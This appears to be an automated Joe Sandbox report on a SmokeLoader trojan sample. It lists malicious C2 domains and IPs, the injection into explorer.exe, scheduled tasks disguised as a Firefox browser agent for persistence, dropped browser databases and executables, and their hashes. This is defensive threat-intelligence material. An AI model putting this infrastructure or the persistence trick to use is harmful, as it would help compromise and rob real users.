https://calvinandhalls.com/ | explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://word.office.comon | explorer.exe, 00000002.00000000.2127227127.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000000.2129926685.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | false | URL Reputation: safe | unknown
https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0 | explorer.exe, 00000009.00000002.2999912401.00000000035D7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | false | Avira URL Cloud: safe | unknown
https://calvinandhalls.com/search.phpMozilla/5.0 | explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2947253493.00000000004F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4536695596.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.4536019543.0000000001119000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4537067944.0000000003207000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4535707850.00000000007D9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://powerpoint.office.comcember | explorer.exe, 00000002.00000000.2129326664.000000000C460000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | false | URL Reputation: safe | unknown
https://calvinandhalls.com/earch.phpX | explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | false | URL Reputation: safe | unknown
https://excel.office.com | explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.micro | explorer.exe, 00000002.00000000.2126713671.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2125996604.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2126747794.0000000008890000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | false | URL Reputation: safe | unknown
https://outlook.com | explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | false | URL Reputation: safe | unknown
https://calvinandhalls.com/search.phpx | explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://android.notify.windows.com/iOS | explorer.exe, 00000002.00000000.2125128556.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://calvinandhalls.com:443/search.phpge | explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | false | URL Reputation: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000002.00000000.2129326664.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com/ | explorer.exe, 00000002.00000000.2127227127.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://calvinandhalls.com/search.phpI | explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.v | explorer.exe, 00000002.00000000.2123559301.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | false | URL Reputation: safe | unknown
https://wns.windows.com/)s | explorer.exe, 00000002.00000000.2127227127.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
116.58.10.60 | nwgrus.ru | Pakistan | 17563 | NEXLINX-AS-AP Autonomous System Number for Nexlinx PK | true
190.98.23.157 | unknown | Suriname | 27775 | Telecommunication company Suriname - TeleSur SR | true
23.145.40.164 | unknown | Reserved | 22631 | SURFAIRWIRELESS-IN-01 US | true
23.145.40.162 | calvinandhalls.com | Reserved | 22631 | SURFAIRWIRELESS-IN-01 US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1518333
Start date and time: 2024-09-25 16:00:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: KTh1gQlT9a.exe (renamed because original name is a hash value)
Original Sample Name: 6d9b8ff6442e3c42a7ad0e1238960057.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@61/15@5/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 140
• Number of non-executed functions: 84
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 20.114.59.183, 4.175.87.197
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: KTh1gQlT9a.exe
Time | Type | Description
10:01:20 | API Interceptor | 213901x Sleep call for process: explorer.exe modified
10:02:34 | API Interceptor | 14x Sleep call for process: WMIC.exe modified
16:01:25 | Task Scheduler | Run new task: Firefox Default Browser Agent B0CDC074D3C7ED7D path: C:\Users\user\AppData\Roaming\esjbbri
16:02:19 | Task Scheduler | Run new task: Firefox Default Browser Agent 4C1107658B81A6D6 path: C:\Users\user\AppData\Roaming\uejbbri
Match | Associated Sample Name / URL | Detection | Threat Name | Context
116.58.10.60 | 7zaC3J8wBV.exe | malicious | LummaC, Go Injector, SmokeLoader | 100xmargin.com/tmp/index.php
| uue9O7WXRA.exe | malicious | SmokeLoader | gebeus.ru/tmp/index.php
| a6lzHWp4pa.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | bipto.org/tmp/index.php
190.98.23.157 | file.exe | malicious | SmokeLoader | nwgrus.ru/tmp/index.php
| file.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader | mzxn.ru/tmp/index.php
| wsr3iUW0I0.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer | sajdfue.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true
23.145.40.164 | file.exe | malicious | SmokeLoader |
| YPDi0gRMHU.exe | malicious | SmokeLoader |
| CNpQfI8eIT.exe | malicious | SmokeLoader |
| 6NlY2E3Wqi.exe | malicious | SmokeLoader |
| 4EtLXn5pqI.exe | malicious | SmokeLoader |
| RWcyVDbMGQ.exe | malicious | SmokeLoader |
| C1APU2jz2B.exe | malicious | SmokeLoader |
| UvrMJYKtES.exe | malicious | SmokeLoader |
| msvR1bl94M.exe | malicious | SmokeLoader |
| 78XCPpouJs.exe | malicious | SmokeLoader |
23.145.40.162 | file.exe | malicious | SmokeLoader |
| YPDi0gRMHU.exe | malicious | SmokeLoader |
| CNpQfI8eIT.exe | malicious | SmokeLoader |
| 4EtLXn5pqI.exe | malicious | SmokeLoader |
| RWcyVDbMGQ.exe | malicious | SmokeLoader |
| msvR1bl94M.exe | malicious | SmokeLoader |
| 78XCPpouJs.exe | malicious | SmokeLoader |
| j1NeIT4ojp.exe | malicious | SmokeLoader |
| QxEATXQDIa.exe | malicious | SmokeLoader |
| UICbFTrVH4.exe | malicious | SmokeLoader |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
nwgrus.ru | file.exe | malicious | SmokeLoader | 190.13.174.94
| Cjmw6m68OV.exe | malicious | SmokeLoader | 109.175.29.39
| file.exe | malicious | SmokeLoader | 185.18.245.58
| file.exe | malicious | SmokeLoader | 93.118.137.82
| OcH6iVxcMe.exe | malicious | SmokeLoader | 211.181.24.133
| file.exe | malicious | SmokeLoader | 119.204.11.2
| file.exe | malicious | SmokeLoader | 190.218.32.149
| file.exe | malicious | SmokeLoader | 183.100.39.16
| SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe | malicious | Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer | 62.150.232.50
| file.exe | malicious | SmokeLoader | 186.233.231.45
calvinandhalls.com | file.exe | malicious | SmokeLoader | 23.145.40.162
| YPDi0gRMHU.exe | malicious | SmokeLoader | 23.145.40.162
| CNpQfI8eIT.exe | malicious | SmokeLoader | 23.145.40.162
| 4EtLXn5pqI.exe | malicious | SmokeLoader | 23.145.40.162
| RWcyVDbMGQ.exe | malicious | SmokeLoader | 23.145.40.162
| msvR1bl94M.exe | malicious | SmokeLoader | 23.145.40.162
| 78XCPpouJs.exe | malicious | SmokeLoader | 23.145.40.162
| j1NeIT4ojp.exe | malicious | SmokeLoader | 23.145.40.162
| QxEATXQDIa.exe | malicious | SmokeLoader | 23.145.40.162
| UICbFTrVH4.exe | malicious | SmokeLoader | 23.145.40.162
bg.microsoft.map.fastly.net | https://texicoschools-my.sharepoint.com/:f:/p/bhadley/EsaMKJ-X61dEm1tZEaws2DMBSjLuzfhGBl4pu2aaho1XiQ?e=fJogeV | malicious | Unknown | 199.232.214.172
| 172726980749816c49da3d830f60283a5a8c1eb734c1073708bb8560faf023d1eb70975126808.dat-decoded.exe | malicious | Unknown | 199.232.210.172
| http://mir-belting.com | malicious | Unknown | 199.232.210.172
| https://odo1s.risongeye.com/oTUk/ | malicious | HTMLPhisher | 199.232.210.172
| https://www.google.cf/amp/%E2%80%8BjuCGrUR%E2%80%8B.%E2%80%8Bs%C2%ADun%C2%ADb%C2%ADu%C2%ADrs%C2%ADt%C2%ADsh%C2%ADe%C2%ADlti%C2%ADes%C2%AD.c%C2%ADo%C2%ADm%E2%80%8B | malicious | HTMLPhisher | 199.232.214.172
| KeyFormed.exe | malicious | Unknown | 199.232.210.172
| 9YOOBuBZtj.exe | malicious | ScreenConnect Tool | 199.232.210.172
| 6Zx9GI028y.exe | malicious | ScreenConnect Tool | 199.232.210.172
| 4ZVhm9dOfO.exe | malicious | ScreenConnect Tool | 199.232.214.172
| y4FSQMICGJ.exe | malicious | ScreenConnect Tool | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Telecommunication company Suriname - TeleSur SR | S1WVSiZOLX.elf | malicious | Mirai, Moobot | 200.2.160.102
| file.exe | malicious | SmokeLoader | 190.98.23.157
| file.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader | 190.98.23.157
| botx.mips.elf | malicious | Mirai | 186.179.165.73
| 6IMo1kM9CC.exe | malicious | LummaC, Poverty Stealer, SmokeLoader | 190.98.23.157
| x86.elf | malicious | Mirai | 186.179.177.66
| nxz1JLFrc3.elf | malicious | Mirai | 186.179.177.51
| 8DR4MV2b0i.elf | malicious | Mirai | 186.179.177.16
| rhdbGGdfoq.elf | malicious | Mirai | 200.2.160.107
| x8bQ5T4284.elf | malicious | Unknown | 186.179.177.13
NEXLINX-AS-AP Autonomous System Number for Nexlinx PK | 7zaC3J8wBV.exe | malicious | LummaC, Go Injector, SmokeLoader | 116.58.10.60
| uue9O7WXRA.exe | malicious | SmokeLoader | 116.58.10.60
| y7cm9CKSN9.elf | malicious | Mirai | 116.58.43.103
| yJgVAg26w0.elf | malicious | Mirai | 116.58.43.106
| 7ZEAQv0SZ6.elf | malicious | Mirai, Moobot | 202.59.68.26
| 7048CflwYY.exe | malicious | LummaC, SmokeLoader | 116.58.10.59
| a6lzHWp4pa.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | 116.58.10.60
| 2.exe | malicious | SmokeLoader | 116.58.10.60
| WFdAK6HQgz.elf | malicious | Unknown | 202.59.68.69
| kH5MfuKUfl.elf | malicious | Mirai | 202.59.81.35
SURFAIRWIRELESS-IN-01 US | file.exe | malicious | SmokeLoader | 23.145.40.162
| YPDi0gRMHU.exe | malicious | SmokeLoader | 23.145.40.162
| CNpQfI8eIT.exe | malicious | SmokeLoader | 23.145.40.162
| 6NlY2E3Wqi.exe | malicious | SmokeLoader | 23.145.40.164
| 4EtLXn5pqI.exe | malicious | SmokeLoader | 23.145.40.162
| RWcyVDbMGQ.exe | malicious | SmokeLoader | 23.145.40.162
| C1APU2jz2B.exe | malicious | SmokeLoader | 23.145.40.164
| UvrMJYKtES.exe | malicious | SmokeLoader | 23.145.40.164
| msvR1bl94M.exe | malicious | SmokeLoader | 23.145.40.162
| 78XCPpouJs.exe | malicious | SmokeLoader | 23.145.40.162
                                                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                72a589da586844d7f0818ce684948eea | file.exe | malicious | SmokeLoader | 23.145.40.164
                                                                | YPDi0gRMHU.exe | malicious | SmokeLoader | 23.145.40.164
                                                                | CNpQfI8eIT.exe | malicious | SmokeLoader | 23.145.40.164
                                                                | 6NlY2E3Wqi.exe | malicious | SmokeLoader | 23.145.40.164
                                                                | 4EtLXn5pqI.exe | malicious | SmokeLoader | 23.145.40.164
                                                                | RWcyVDbMGQ.exe | malicious | SmokeLoader | 23.145.40.164
                                                                | C1APU2jz2B.exe | malicious | SmokeLoader | 23.145.40.164
                                                                | UvrMJYKtES.exe | malicious | SmokeLoader | 23.145.40.164
                                                                | msvR1bl94M.exe | malicious | SmokeLoader | 23.145.40.164
                                                                | 78XCPpouJs.exe | malicious | SmokeLoader | 23.145.40.164
                                                                a0e9f5d64349fb13191bc781f81f42e1 | ptgl503.exe | malicious | LummaC | 23.145.40.162
                                                                | Suselx1.exe | malicious | LummaC | 23.145.40.162
                                                                | gkqg90.ps1 | malicious | LummaC | 23.145.40.162
                                                                | 009.ps1 | malicious | LummaC | 23.145.40.162
                                                                | ir57.ps1 | malicious | LummaC | 23.145.40.162
                                                                | ueu7.exe | malicious | LummaC | 23.145.40.162
                                                                | opqg.ps1 | malicious | LummaC | 23.145.40.162
                                                                | Info.ps1 | malicious | LummaC | 23.145.40.162
                                                                | Res.ps1 | malicious | LummaC | 23.145.40.162
                                                                | 0x000e00000001da78-93.exe | malicious | LummaC | 23.145.40.162
                                                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                C:\Users\user\AppData\Roaming\uejbbri | file.exe | malicious | SmokeLoader |
                                                                C:\Users\user\AppData\Local\Temp\B575.exe | file.exe | malicious | SmokeLoader |
                                                                C:\Users\user\AppData\Local\Temp\E647.exe | file.exe | malicious | SmokeLoader |
                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):98304
                                                                      Entropy (8bit):0.08235737944063153
                                                                      Encrypted:false
                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):0.017262956703125623
                                                                      Encrypted:false
                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):0.017262956703125623
                                                                      Encrypted:false
                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):0.8439810553697228
                                                                      Encrypted:false
                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.136413900497188
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):0.6732424250451717
                                                                      Encrypted:false
                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.121297215059106
                                                                      Encrypted:false
                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                      Malicious:false
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):78336
                                                                      Entropy (8bit):6.404330124931981
                                                                      Encrypted:false
                                                                      SSDEEP:1536:/JI4z5y6VGZRohUx4r1u8zC4hMM4WiXD4:/JykFC4WJr
                                                                      MD5:12AD2C78F5EB326820444DCFE9DFA683
                                                                      SHA1:F1B3A16E65CEB78EF67A0B896C65B6BFE58DABEA
                                                                      SHA-256:A6F7D8211414EF77E92730DB874BABF8F200B07C5AA194A71FA00F2C8BE5BDE7
                                                                      SHA-512:E63A638890FF42626D2E91E4F34205CCC6F8F13E88F5C7E0B7982BD1C18F58BD18CAA35A717F97C9B37E8304327ED35350A173BD9583EC0C396CB724AF5070AF
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Joe Sandbox View:
                                                                      • Filename: file.exe, Detection: malicious
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):417280
                                                                      Entropy (8bit):6.850109840048764
                                                                      Encrypted:false
                                                                      SSDEEP:6144:qg+Ov/uYh8vkotYJjh+qCeNKkzXlGIXhh1/pYgzquE6Y2T3:yOv9h8vF8+qekzEClYhu1YA
                                                                      MD5:1A29ED2D1AE240EC1D6F50DCC960BAA3
                                                                      SHA1:CAF7120A216A3A39BEE558A6A660F1FFC214A712
                                                                      SHA-256:2E4015F84A9A6D9C22EF65ACC66A3CF55C2CABC2D7A6F32B96297CA7D0F56EA4
                                                                      SHA-512:B5ABBB5ED0431F80E429849C4B45CE1A35A2D123E63520D8863A9817B6A599CC20A2B433B59162E48F546B0D335F16B717A2BEF70F207D3195D5955E70A51BAB
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Joe Sandbox View:
• Filename: file.exe, Detection: malicious
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..A.........`......`.)./..`...s....$..........`......`.-....`.*....Rich...........................PE..L...Kt.e............................S8............@..................................5..........................................d.......P...........................0...............................0...@...............0............................text..."........................... ..`.rdata..x...........................@..@.data............^..................@....rsrc...P............X..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):418304
                                                                      Entropy (8bit):6.853098055766101
                                                                      Encrypted:false
                                                                      SSDEEP:6144:lwpk63+zRADFXmigaB0r9v1FkJNdj4E5nkJv23J7quw2T6:+pkQ+zRAhXmiLQ9vmaElkJv2YuwJ
                                                                      MD5:6D9B8FF6442E3C42A7AD0E1238960057
                                                                      SHA1:FAB711B446C2CC55F97C7A5AFAA9F9833E01A0EA
                                                                      SHA-256:A641AF0462259586CF10B8867653E163F73B6066106455605643B08AB829AC77
                                                                      SHA-512:DC71917D187F65526AD9218D1DB79D83752DF9017D72EF5AFC5607567A4E3B20E3AC77D5C765FCCE7F9F18CE8524BED0181DB09028A29B832E1928579EE3CE98
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 34%
